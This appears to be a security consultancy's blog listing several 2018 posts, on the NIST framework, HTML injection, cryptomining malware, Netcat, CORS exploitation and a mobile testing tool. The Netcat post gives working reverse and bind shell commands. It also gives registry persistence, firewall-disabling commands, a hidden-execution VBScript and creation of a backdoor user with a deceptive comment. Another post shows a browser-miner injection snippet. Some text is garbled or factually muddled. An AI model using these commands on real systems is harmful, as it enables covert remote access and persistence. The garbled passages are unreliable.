Showing posts with label Security. Show all posts
Showing posts with label Security. Show all posts

Friday, 18 May 2018

NIST CYBERSECURITY FRAMEWORK 1.1


NIST CYBERSECURITY FRAMEWORK 1.1

INTRODUCTION

The Framework 1.1  offers an agile way to address cybersecurity, including cybersecurity’s effect on physical, cyber, and people dimensions. It applies to organisations relying on technology, whether their cybersecurity focus is primarily on Information Technology (IT), Industrial Control Systems (ICS), Cyber-Physical Systems (CPS), or connected devices more generally, including the Internet of Things (IoT). The Framework 1.1 can enhance the organisations in addressing cybersecurity as affects the privacy of other data. Additionally, the Framework’s 1.1 outcomes serve as targets for workforce development and evolution activities.
The Framework 1.1 is not a one-size-fits-all method to manage cybersecurity risk for critical infrastructure. Organizations will continue to have static risks with different threats and vulnerabilities, and also with risk tolerances. They also will vary in how they customise practices described in the Framework 1.1. Organizations can determine activities that are important to critical service delivery and can prioritise investments to maximise the impact of each dollar spent. The Framework 1.1 is aiming to reduce the risk and better managing cybersecurity threats.
The Framework 1.1 is a living document and will continue to be updated and improved as the industry responds to implementation. NIST will continue coordinating with the private sector and government agencies at all levels. As the Framework 1.1 is placed into higher practice, additional lessons learned will be integrated into future versions. It will ensure the Framework 1.1 which meets the needs of infrastructure owners and operators in a critical environment of new threats and also the solutions.

USAGE OF FRAMEWORK 1.1

An organisation can use the Framework 1.1 as a critical part of its systematic process for identifying, assessing, and managing cybersecurity risk. The Framework is not used to replace existing methods, but companies can use its current method, and that can overlap it onto the Framework 1.1 to determine loopholes in its current cybersecurity risk approach. The Framework 1.1 can be used as a cybersecurity risk management tool; an organisation can identify activities that are most central to critical service delivery and prioritise expenditures to maximise the impact of the investment.
It is designed to complement cybersecurity operations. It can serve as the foundation for a new cybersecurity program or a mechanism for improving an existing application. The Framework  1.1 provides a means of articulating cybersecurity requirements to business partners and customers and can help identify gaps in an organisation’s cybersecurity practices.
The Framework 1.1 can be applied throughout the lifecycle phases of the plan, design, build/buy, deploy, operate, and decommission. The planning phase begins the cycle of any system and lays the groundwork for everything that follows. Overarching cybersecurity considerations should be declared and described as clearly as possible. The plan should be recognized that those requirements are to evolve during the remainder of the life cycle.
CYBERSECURITY USAGE FRAMEWORK 1.1

CONCLUSION

The Cybersecurity Framework 1.1 is intended to reduce risk by improving the management of cyber security risk to organisational objectives. Ideally, organisations using the Framework 1.1 will be able to measure and assign values to their risk along with the cost and benefits of steps taken to decrease risk to proper levels. The better an organisation can estimate its risk, costs, and advantages of cybersecurity strategies and actions, the more rational, useful, and valuable its cybersecurity approach and investments will be.
Over time, self-assessment and measurement should improve decision making about investment priorities. For example, measuring – or at least robustly characterising – aspects of an organisation’s cybersecurity state and trends over time can enable that organisation to understand and convey meaningful risk information to dependents, suppliers, buyers, and other parties. An organisation can accomplish this internally or by seeking a third-party assessment. If done correctly and with an appreciation of limitations, these measurements can provide a basis for healthy trusted relationships, both inside and outside of an organisation.

REFERENCE:

https://www.nist.gov/cyberframework
https://www.us-cert.gov/ccubedvp/cybersecurity-framework

AUTHOR

Dharmesh B
Security Engineer
Briskinfosec Technology and Consulting Pvt Ltd.,
https://www.linkedin.com/in/dharmeshbaskaran/

Posted by at No comments:
Labels: , , , , , , , , , ,

Monday, 23 April 2018

HTML INJECTION ATTACK

HTML INJECTION ATTACK


INTRODUCTION:

HTML injection is an attack which occurs in web applications that allows users to insert an HTML tag attributes via using any specific parameters like,  <h>, </h1>, <td>, <tr>, <a href> tags are used as one of the sources to perform this HTML based injection attack.
These strategies provided with untrusted input, at that point there is a high risk of XSS, specifically an HTML injection one. If strings not sanitised efficiently, the issue could prompt XSS based HTML injection. This HTML injection could lead the attacker to modify the web content easily.

POSSIBLE ATTACK SCENARIO:

In this way, how we can perform an HTML injection attack using the following steps,
  •  In this beginning process, an attacker can find the injection flaw and try to make an HTML injection attack.
  • Attacker crafts the malicious links, including his infected HTML injection code and sends it to a client through an email
  • When the client visits the web page because of the page located within a trusted domain
  • The attacker can inject an HTML code is rendered and presented to the client requesting valid credentials like username and password
  • The client enters a username and password, which are both sent to the attacker server.
HTML injection attack also have two different types, there are
  • stored HTML injection attack
  • Reflected HTML injection attack

STORED HTML INJECTION ATTACK

In this stored HTML is also known as persistence (always stored in the backend database), the attacker can give the credentials inserting in the web server it can be stored in permanently, and the application server gives out it to the user when the user visits the targeted website. Here I have to give a sample HTML code for the stored HTML injection.
When the client clicks the payload, it gets redirected to the official part of the website; the injected HTML code will get executed by the browser.

REFLECTED HTML INJECTION

The reflected HTML is known as Non-persistence (It does not store in the backend database, it will get immediately indicated). Whenever the backend server processes any HTML input without proper sanitisation and validation of the given HTML input,  it will lead to HTML injection in the web application.

Here I have to give the input like <h>you are hacked</h>, and it will reflect as ‘you are hacked “ class=” colourbox” title=” help me with page”>

MITIGATION FOR HTML INJECTION:

Here we used parameterised queries to block unwanted scripts for the HTML injection using special characters like <, >, “, ‘, %, &, / to appropriately sanitised in the given input fields. The favoured choice is to utilise a protected API which stays away from the utilisation of the translator entirely or provides a parameterised interface. Be careful of APIs, for example, put away methods, are parameterised.
If a parameterised API isn’t accessible, you should carefully escape unique characters utilising the appropriate escape grammar for that translator.

CONCLUSION:

HTML injection is similar to cross-site scripting vulnerability (XSS), which affects the client side. So, HTML injection can exploit in the same way as that of cross-site scripting which includes adding HTML data to the web application, temporary defacement of website etc… hence it is necessary to prevent web applications from HTML injection.

AUTHOR

Aravindan S
Security Engineer
BriskinfoSec Technology and Consulting  Pvt Ltd.,
https://www.linkedin.com/in/aravindhan-s-90b98787/
Posted by at No comments:
Labels: , , , ,

Monday, 2 April 2018

CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


CRYPTOCURRENCY MINING IN AN OFFENSIVE WAY


Cryptocurrency mining is a kind of digital currency which transfer across the internet, By using cryptocurrency mining people started to earn money in online
In recent days many people began to make money by this process, where it calculates the hash rate for every payment for (e.g.) if you are transferring money through online the interest rate of the required transaction is shared to the bank by which he moved capital
Here Cryptocurrency mining started to capture the hash rate for each payment, and some required share get passed to the person who mines it and by each transaction, it generated a blockchain and based on its other new bitcoins gets created

CRYPTOCURRENCY MINING MALWARE INFECTED OVER HALF-MILLION PCS USING NSA EXPLOIT

Several Cybersecurity firms are reporting on new cryptocurrency mining viruses that are being spread using Eternal Blue NSA exploit the hacking group Shadow Brokers leaked that
Researchers from Proof point discovered a massive global botnet dubbed “Smominru” that is using Eternal Blue SMB exploit (CVE-2017-0144) is the primary function is used to infect Windows computer to secretly mine Monero cryptocurrency, worth about millions of dollars, for its master
In 2017, Smominru botnet has already infected more than 526,000 Windows computers, most of which are believed to be servers running unpatched versions of Windows. According to researchers and based on the hash power obtained by Monero Payment address the control of the botnet get raised twice than the regular botnets
This botnet has already mined over 8,900 Monero, valued about a range of $3.6 million, at the rate of roughly 24 Monero per day and by using it they started to steal millions of computers, and it mainly affects over Russia, India and Taiwan
A proof point of researchers says that cybercriminals are using at least 25 machines to scan the internet to find vulnerable Windows computer and also using leaked NSA’s RDP protocol exploit of Esteem Audit (CVE-2017-0176) for infection.
Want amine is one of the recent Eternal Blue exploit to infect computers to mine Monero cryptocurrency, and it’s was harder to detect by any antivirus, and it affects many companies for nearly about weeks or over months
Attackers started to use Crypto jacking, used as a browser-based JavaScript code, and cryptocurrency miners utilise this method for  website visitors CPUs power to mine cryptocurrencies for monetisation

BROWSER-BASED CRYPTOCURRENCY MINING:

Browser-based cryptocurrency mining is a part of mining process that performed through your browser, and it’s one of the oldest methods launched in 2011, and it works on based on some scripts and it different from file-based cryptocurrency which involves downloading and executing a detectable files
Bitcoin plus is one of the methods to mine your browser. we can generate a JavaScript code, and once we inject the JavaScript code on the web page when a visitor gets signup to the page automatically the page gets mined, and browser-based mining takes place, and the mined Javascript code for your reference
Example Script:
  1. < Script src = https: //testphp.vulnweb.com/lib/testphp.min.js></script>
  2. < Script > Var miner = newcognitive.User(‘ < site - key > ’, ‘john - days’);
  3. Start(); < /Script>
Once the required codes get executed on your website your browser gets started to mine, and it also increases the load of your CPU session, and by this method, the end user can be easily get profited

PREVENTION FROM BROWSER CRYPTOCURRENCY MINING:

Apart from ransomware the cryptocurrency mining malware place a vital role in our daily life and this mining is mainly used to mine your website
Most attackers use Pirate bay to look over the CPU process usage, we can also use it to detect the CPU usage of your system, and we can check out if any unknown website or mining website are running over, by the way
By the way, we can detect many mined sites, or we also have several browsers add-on to identify the mined websites, and they are as follows.
  • Use No Coin Extension
  • Use Minor Block Chrome Extension
  • Block coin mining domains in hosts file
  • Use no scripts in Firefox

HOW CRYPTOCURRENCY MINING ACHIEVED THROUGH RANSOMWARE:

Cryptocurrency mining can also be done using ransomware techniques, and here a new ransomware miner called the Trojan-Ransom.Win32.Linkup a new kind of ransomware it does not encrypt your files it just creates a mining robot on your system
Link-up ransomware creates a fake websites get created on your system and by this site if a person uses it redirect your site to some other site and by this through the add on’s on fake site credits some share amount to the miner
By this ransom it ask you to download some malware files, and once you installed it automatically download some bitcoin mining software
When  the  victim clicks the required software it gets processed and it makes your CPU or system runs faster and consumes higher energy
It further leads to increase your electric bill rate higher, based on the electric energy consumed  the crypto miners get some shares6
Linkup ransomware is also a different type of other malware like crypto locker, and it was also ransomware which hits  a virus on US police department and asked to pay $800 bitcoins, and the virus is removed once the demanded amount paid to render it more concerning than linkup

MOBILE CRYPTOCURRENCY MALWARE ATTACKS:

Cryptocurrency Mining malware attacks are started to affect mobile devices by passing mined code on android apps, and it’s been affecting most of the android users who download some legitimate-looking apps that are packed with some codes that “mines” for hackers without the user’s knowledge
These attacks are already happening in North America and Russia, and half of the cryptocurrency mining malware attacks are in Russia, and 20 percent are in the US, and a recent spate of attackers started to send some fake message of phishing attacks in Australia, and it tries to convince the victim to download some mining malware to their phones
One example of mobile cryptocurrency mining malware that Symantec sends a Motherboard appeared to be a fully-functioning crossword puzzle game, app but in the background, it was fetching some mining cryptocurrencies and by running the mined apps may drain your battery and make your Phone less responsive be aware before you started to use an unknown apps

OVERALL CRYPTOCURRENCY MINING USED BY THE ATTACKERS:

CONCLUSION:

Cryptocurrency mining attacks can spread using various phases like botnets, browser-based using JavaScript mined codes, and it also affects mobile phone through some malicious apps and by using this cryptocurrency mining many attackers started to earn money, and you can check it through some bitcoin apps that are available on the internet
Reference Links:

AUTHOR

RamKumar G
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/ram-kumar-3439b511a/
Posted by at No comments:
Labels: , , , , ,

Friday, 23 March 2018

NETCAT


NETCAtNetcat is a computer network utility used for taking access, sending access, sending and receiving files over the internet using TCP and UDP connection. This tool is very famous for debugging the network and for investigation purpose. Netcat is also known as NC or swiss army knife. It is the most critical threat to network admins, programmers and penetration testers.


NETCAT SETUP:

Setting up netcat in windows is very simple. You download Netcat for windows from the given link  https://joncraton.org/blog/46/netcat-for-windows/.
Once you downloaded it extract the file in c directory. Then just open the command prompt and navigate to the netcat directory (yes I know we are lazy, shortcut to open a command prompt from the same directory, just got to the netcat directory hold shift and right click, and you will see an option “open command windows here” ) now run nc.exe.
In Linux netcat is pre-installed. So we don’t need to worry about it. If you don’t find in Linux, open the terminal and type “apt-get install netcat”. This command will install netcat for you.
In this blog is using Kali Linux as my attacker machine and victim machine as windows 7.

PENETRATION TESTING WITH NETCAT

Netcat is used for two primary modes of operation, one is as a client, and the other is a server. These two operations are hackers favourite, and penetration testers also use these operations.
The primary usage of the two modes is connected to somewhere and listen for inbound
connect to somewhere: nc [-options] host-name port [s]  # this syntax is for netcat client mode
listen for inbound : nc -l -p port [options] [host-name] [port] # this syntax is for netcat server mode
the most commonly used options in netcat are
-c shell commands       as `-e'; use /bin/sh to exec [dangerous!!]

-e filename                  program to exec after connect [dangerous!!]

-l                                  listen mode, for inbound connects

-n                                 numeric-only IP addresses, no DNS

-p port                       local port number

-u                                 UDP mode

-v                                 verbose [use twice to be more verbose]

-z                                 zero-I/O mode [used for scanning]
Netcat most potent options are -e prog. This option is used in server mode, which allows netcat to execute a command on the remote system. This option will enable netcat to run the specific program when clients connect to the server.
Nc -l -p 1234 -e cmd.exe        # windows

nc -l -p 1234 -e bin/sh             # Linux
These are the basics of netcat. If you are still a beginner in netcat read this article for clear understanding  http://scitechconnect.elsevier.com/wp-content/uploads/2013/09/Introduction-to-Netcat.pdf
let’s get into real-time penetration testing with netcat
let’s get a basic reverse shell from windows 7
nc -lvp 1234  # Kali Linux

nc.exe 192.168.0.151 1234 -e cmd.exe # windows (IP mentioned is Kali IP address)
when victim enters the command, ill get a reverse shell in Kali

 POST EXPLOITATION WITH NETCAT

post exploitation is the crucial phase of penetration testing and fun part too.So here is some fun part that we can perform using netcat.
Once we get a reverse shell from the victim system, we need to do some following steps
. That’s is maintaining the connection.
All the attackers face a big problem, which is session expiration. So here are some command s to make the session persistent.
@echo offxcopy"%systemdrive%\%username%\Desktop\nc.exe""C:\Windows\System32\" -­y         

             reg add "HKLM\soQware\microsoQ\windows\currentversion\run" /f /v"system" /t REG_SZ /d            "C:\windows\system32\nc.exe-­Ldp449 -­ecmd.exe”            

netsh advfirewall firewall add rule name="Rule 34" dir=in action=allow          protocol=UDP localport=449 

           netsh advfirewall firewall add rule name="Allow Messenger" dir=in action=allow      

 program="C:\windows\system32\nc.exe "
 NOTE: this command should run as administrator

 RUNNING THE NETCAT IN BACKGROUND

Here is the vb script to run netcat in the background, so that you don’t have to wait for the user to restart their computer.
Dim objShellSet objShell = Wscript.CreateObject ("WScript.shell")objShell.run"C:\windows\system32\nc.exe -Ldp 449 -e cmd.exe"

SetobjShell =  Nothing
play with firewall
netsh advfirewall set all profiles state off
Turn off windows firewall will notify the user
netsh advfirewall set allprofiles state           on      
– Turns firewall on
netsh advfirewall reset
– Reset the firewall back to  default
netsh advfirewall set all profiles firewallpolicy blockinbound,allowoutbound
– Block everything
netsh advfirewall firewall add rule name="HTTP" protocol=TCP localport=80 action=block           

 dir=IN
– Open Port
netsh advfirewall firewall delete rule name=" HTTP.”
– Delete Rule
schedule tasks
we can also be able to mess with windows schedule task; we can able to create, delete and run a task.
Creating Tasks
  – SCHTASKS /Create /S system /U user /P password /RU runasuser /RP runaspassword     

  /SC HOURLY /TN rtest1 /TR notepad
Delete  Tasks
  – SCHTASKS /Delete /TN "Backup and Restore.”       
Running Tasks
SCHTASKS /Run /TN "StartBackup"
now let’s create and add a local user and granting with administrator right
net user /add briskinfosec Netcat /comment:"Approved through 3/07/2018 per CTO" /

fullname:"brisk info sec"
Netcat is used for scanning ports on the network.
nc  -v  192.168.0.170   - z 1-1000   # ip = target ip

OUTPUT:

root@7h3pr0xy:~# nc -v  192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 554 (rtsp) open

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open
sometimes we need to randomise the port as well against the target to alert the IDS (intrusion detection system) or IPS (intrusion prevention system).
nc -v -r 192.168.0.170 -z 1-1000

OUTPUT

root@7h3pr0xy:~# nc -v -r 192.168.0.170 -z 1-1000

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 445 (microsoft-ds) open

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open
(UNKNOWN) [192.168.0.170] 554 (rtsp) open
While performing penetration testing less information will not help us to move forward. So we look for more details. In netcat, we have a verbose which give more info about the target.
nc -vv -r 192.168.0.170 -z 130-140

OUTPUT:

root@7h3pr0xy:~# nc -vv -r 192.168.0.170 -z 130-140

192.168.0.170: inverse host lookup failed: Unknown host

(UNKNOWN) [192.168.0.170] 131 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 135 (loc-srv) open

(UNKNOWN) [192.168.0.170] 130 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 134 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 139 (netbios-ssn) open

(UNKNOWN) [192.168.0.170] 133 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 140 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 132 (?) : Connection refused

(UNKNOWN) [192.168.0.170] 137 (netbios-ns) : Connection refused

(UNKNOWN) [192.168.0.170] 138 (netbios-dgm) : Connection refused

(UNKNOWN) [192.168.0.170] 136 (?) : Connection refused

 sent 0, rcvd 0
Netcat can be used for the offensive purpose as well as defensive. If you are right programming, you can automate the executing process
NOTE: use this swiss army knife in a useful way, so no one gets hurt with a sharp edge.
Play safe and be safe

AUTHOR

Venkatesh C.S
SecurityEngineer
BriskInfoSec Technology and Consulting PVT LTD
Find  me @ https://www.linkedin.com/in/venkatesh-c-s-44174711b/
Posted by at No comments:
Labels: , , ,

Monday, 29 January 2018

How can Insecure CORS lead to a biggest security threat for your application?

HOW CAN INSECURE CORS LEAD TO A BIGGEST SECURITY THREAT FOR YOUR APPLICATION?

WHAT IS THE MEANING OF AN ORIGIN?

Two websites are said to have same origin if both have following in common:
  • Scheme (http, https)
  • Host name (google.com, facebook.com, briskinfosec.com)
  • Port number (80, 4657, 7777)
So, sites http://example.com and http://example.com/settings have same origin. But https://example.com:4657 and http://example.com:8080/settings have different origins.
The ‘Same Origin Policy’ restricts how a script loaded from one origin can interact with a resource from another origin. It is an important built-in security mechanism for browsers for isolating potential malicious scripts.

WHAT IS CROSS ORIGIN RESOURCE SHARING?

It is the need of Web 2.0 to share resources across origins. Following are some examples:
  • Cross Origin Writes: A website can POST data to an endpoint of another website.
  • Cross Origin Embedding: A website can refer images from another website using <img src> tag. Also, an iframe using <iframe src> tag can be embedded if the source website allows it.
Apart from the above two scenarios, when one website reads data from another website, it is called as ‘Cross Origin Resource Sharing’ aka CORS.
CORS is a W3 specification that allows cross domain communications from the browser. It works by adding new HTTP Headers that describe the origins that are allowed cross domain information sharing.
In other words, CORS is used to relax the ‘Same Origin Policy’ for legitimate and trusted requests. It is an essential feature of Web 2.0 to support APIs that are exposed via web services to be accessible.
 Some noteworthy example of web applications supporting CORS: Google, YouTube, Flickr.

TWO MOST IMPORTANT CORS HEADERS:

  • Origin: It is set by browser in every CORS request. Its value is the domain name from which the request originates.
  • Access Control Allow Origin: It is set by server in every CORS response. Depending on its value, the browser decides if the response is allowed or not. It can be set to * (also called the wildcard character) to make resources public (However, this is not a good practise).

PRE-FLIGHT REQUEST

A pre-flight request is just a normal HTTP request that happens before the actual cross-domain communication. The logic behind this is to ensure the client and server are fully compatible (protocol, security, and so on) with each other before the data is actually exchanged. If they are not, then the relevant error is raised.
Please keep that in mind that a pre-flight request only triggers if:
  • Custom HTTP headers are sent
  • The body MIME-type is different than text/plain
  • The HTTP method is different than GET or yuPOST
The following is a typical pre-flight request-response pair:
Request:
   OPTIONS / HTTP/1.1
   Origin: http://api.user.com
   Access-Control-Request-Method: PUT
   Host: api.example.com
   Accept-Language: en-US
   Connection: keep-alive
   User-Agent: Browser
Response:
   HTTP/1.1 204 No Content
   Access-Control-Allow-Origin: http://api.user.com
   Access-Control-Allow-Methods: GET, POST, PUT
   Content-Type: text/html; charset=utf-8

SIMPLE REQUEST

A simple CORS request is similar to a pre-flight request without the initial capability exchange sequence occurring. In a typical simple CORS request, the following sequence happens:
Request: http://example.com  – Origin A
Response: http://cdn.briskinfosec.com – Origin B
  1. Origin A attempts to access the home page of a CDN running at origin B, http://cdn.briskinfosec.com , using CORS.
  2. Origin A sends a GET request to the Origin B web server.
The Origin B server responds with Access-Control-Allow-Origin.

A SCENARIO TO EXPLOIT CORS VULNERABILITY:

In this demo we are going to use a vulnerable intranet application which has a secret located at ‘secret-cors-3.php’. It has an Admin who accesses it from his local environment. Its URL is: http://127.0.0.1:80/bwapp/.
As it is an intranet application, the attacker cannot interact with it remotely. Our goal as an attacker will be to capture the secret (from a remote internet location) by exploiting CORS vulnerability.

THE EXPLOITATION:

  • The attacker hosts a website containing the malicious script for cross domain interaction.
  • Victim i.e. the Admin of the intranet website visits the attacker’s website. Location http://127.0.0.1:4567
  • Response is received from the attacker’s website containing the following malicious payload:
  • As soon as the web page is loaded, ‘makeRequest’ method is called. The method initiates a cross domain request to capture the secret, to the vulnerable intranet application located at ‘http://127.0.0.1:80/bwapp/secret-cors-1.php’
  • It fetches the response and stores it in the variable ‘secret’.
  • The ‘Access-Control-Allow-Origin’ has value set to *. So, the malicious script now has the payload and it simply issues a GET request to the attacker’s web server. Attacker hosts another web server at location: http://127.0.0.1:7777
  • Meanwhile, attacker monitors the logs of that web server. The payload gets executed and the logs receive the secret.

HOW TO MITIGATE IT?

  • ‘Access-Control-Allow-Origin’ should be never set to * if the resource contains sensitive information.
  • The mitigation is simple and just a proper configuration. Configure the Access-Control-Allow-Origin header to allow requests only from the domains that you trust. For e.g.: Access-Control-Allow-Origin: Saurabh.com. The below image illustrates that the CORS attack does NOT get executed when the server is configured with correct ‘Access-Control-Allow-Origin’ instead of a ‘Wildcard’ character.
  • Make sure that in server side validation for checking the origin header value, you are comparing with absolute value and NOT with regular expression.
  • For example: The following code does a comparison with regular expression:
RegEx(“^https://mail.example.com$”)
In the above validation, dots (.) mean any character. So, an attacker can bypass it by making the CORS request origin from following domain: https://mailxexample.com
The patched code will be:
            if($_SERVER[“HTTP_ORIGIN”] == “https://mail.example.com”)
                    {
                        header(“Access-Control-Allow-Origin: https://mail.example.com”);
                    }
  • Client should not trust the received content without sanitization because that will result in client side code execution. For example: If website abc.com trusts and fetches cross domain data from example.com. example.com has a malicious intent and starts sering malicious javascript to abc.com, then abc.com can protect its users from cross site scripting by sanitizing the received data and then presenting it to its users.

WHAT IF THE ORIGIN HEADER IS SPOOFED?

The point of origin header is not to protect the resources on the server, that task is up to server itself. Origin header is to protect the user. Following scenario demonstrates it:
  • An attacker Charlie creates a malicious website M
  • User Alice is tricked into visiting website M which tries to perform CORS action on server example.com that supports it.
  • The domain example.com will be listed in website M’s list of allowed domains. So, the request will be rejected.
  • The important point here is that M cannot spoof the origin header because the request is initiated from Alice’s browser.
  • This can be done by Alice using a local proxy tool. But why would a victim hack himself, so this scenario is not real.
Another way, an attacker can do this, is by intercepting the request being a man in the middle. But if the attacker has access to the traffic, then capturing cookies and session ID are better options rather than changing the Origin header.

OWASP CATEGORY FOR CORS VULNERABILITY:

This vulnerability falls under to the category of ‘Security Misconfiguration’ of OWASP Top 10. The HTTP response header ‘Access-Control-Allow-Origin’ is not configured correctly and this creates the issue.

REFERENCES:

We have discussed about what CORS is and how to exploit CORS vulnerability in the web application and API web services .It is important to   verify that the CORS are configured properly. As a p part of web application   we need to make sure the shared resource are secure and HTTP headers haven’t tampered. A CORS Exploitation can cause great consequences letting sensitive data to compromise.
BriskInfosec provides the best web application and API security test.  Discover the reason to conduct Application Security test with us.
Reach us – Contact@briskinfosec.com
Author
RadhaKrishnan
Security Engineer
BriskInfosec Technolagy and Consulting PVT LTD
https://www.linkedin.com/in/radhakrishnan-r-209607111/
Posted by at No comments:
Labels: , , , , , ,

Wednesday, 3 January 2018

YSO – Opensource MOBILE SECURITY FRAMEWORK

YSO – OPENSOURCE MOBILE SECURITY FRAMEWORK

YSO is the Mobile Security Framework and they are capable of performing Static and Dynamic analysis on mobile Applications and Its supports only APK (Android) and IPA (IOS) files and they are various tools used to decompile, debug and code review in mobile app testing and it consumes lot of time and by this framework we can able to check over various mobile issues like
  • Insecure Data Storage
  • Insecure Communication
  • Insecure Authentication
  • Certificate Pinning
  • Backup Data’s Enabled etc.
The above issues are the major mobile issues that are occurred in a common way
In Static Analysis it used to detect automated Code review, insecure Permissions, Configuration issues, and it also detects over insecure code like SSL overriding, SSL bypass, weak crypto, obfuscated codes, improper permissions, hard coded secrets, improper usage of dangerous APIs, and leakage of sensitive/PII information.
In Dynamic Analysis is slightly difficult to configure it mainly runs on the VM or on a configured devices and detects the issues at run time and Further analysis is done on the captured network packets, decrypted HTTP traffic, dumps, logs, etc.
This tool is highly scalable by which you can add your custom rules in easy use and you can use this framework results as a source to detect the mobile application issues manually and finally the overall report gets saved on the required folder that you are selected.
Requirements:
Notes:

STATIC ANALYSIS APK RESULTS:

CERTIFICATE ISSUE:




Static Analysis in IOS result:

CONFIGURING STATIC ANALYZER:

Tested on Windows 7, 8, 8.1, Ubuntu, OSX Marvicks
Install Django version 1.8
Pip install Django==1.8
Here I have installed Django in Linux
Django is one of the Web application Framework that used to make the process easier because it has some automated tools in-build so it executes the result at short interval of time
YSO Framework Configuration in Linux:
I have configured the YSO Framework and configured the server and
Configuration Linkhttp://127.0.0.1:8000/
Once you have entered this URL in your browser U’ll get a Page as follows

YSO EXECUTION ON BROWSER:

Here In this Framework you can upload a particular APK file OR IPA File that you are going to test and it executes the result as in the above figure

CONCLUSION:

From this Blog we have discussed above the installation, Configuration and working Method of YOS Mobile application Framework and we also discussed the results executed for a particular APK or IPA files.
YSO Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static and dynamic analysis. We’ve been depending on multiple tools to carry out reversing, decoding, debugging, code review, and pen-test and this process requires a lot of effort and time. YSO Mobile Security Framework can be used for effective and fast security analysis of Android and iOS Applications.
BiskInfosec provides the best mobile Security solutions. For further doubts and security solution advices reach us @ Contact@briskinfosec.com

AUTHOR

RamKumar
Security Engineer
BriskInfosec Technolagy And consulting PVT LTD
follow me @https://www.linkedin.com/in/ram-kumar-3439b511a/
Posted by at 1 comment:
Labels: , , , , , , ,
Subscribe to: Posts (Atom)